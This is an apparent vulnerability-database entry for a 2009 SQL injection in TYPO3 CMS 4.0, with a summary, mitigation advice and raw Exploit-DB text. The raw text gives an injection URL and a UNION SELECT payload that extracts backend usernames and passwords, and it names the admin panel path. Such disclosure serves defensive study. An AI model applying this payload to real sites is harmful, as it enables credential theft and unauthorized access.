TYPO3 CMS 4.0 SQL-Injection Vulnerability

vendor:

TYPO3 CMS

by:

CyberNaj, JxE-13

7,5

CVSS

HIGH

SQL injection

CWE

Product Name: TYPO3 CMS

Affected Version From: 4.0

Affected Version To: 4.0

Patch Exists: NO

Related CWE: N/A

CPE: a:typo3:typo3_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

TYPO3 CMS 4.0 SQL-Injection Vulnerability

A SQL injection vulnerability exists in TYPO3 CMS 4.0. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application and execute arbitrary SQL commands in application's database. This can allow the attacker to access or modify critical application data, compromise the application, access or modify data in the backend database, and exploit various other attacks.

Mitigation:

Developers should never construct SQL statements directly from user input. Instead, parameterized statements should be used to avoid SQL injection attacks. Additionally, input validation should be used to detect malicious input early and prevent it from entering the system.

Source

Exploit-DB raw data:

#-----
TYPO3 CMS 4.0  SQL-Injection Vulnerability
#-----


 #####################################################
 # [+] Author        :  CyberNaj, JxE-13             #     
 # [+] Vulnerability :  SQL injection                #
 # [+] Group         :  Ro0T-MaFia                   #
 #####################################################

#-----

 Info CMS:

 * Name      : TYPO3
 * Web       : http://typo3.org
 * dowloand  : http://typo3.org/download/packages/      
 * Country   : Venezuela
               
#-----

Vulnerability:

http://www.host.com/index.php?id=[xxx][showUid]=[SQL-injection]&cHash=[xxx]

SQL-injection: -1+union+select+username,2,password,4,5,6,7+from+be_users--

Admin Panel: /typo3/index.php

#-----

# milw0rm.com [2009-08-06]